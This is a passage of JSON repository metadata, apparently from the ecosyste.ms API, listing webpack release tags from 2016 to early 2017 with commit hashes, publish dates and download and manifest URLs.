pack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/w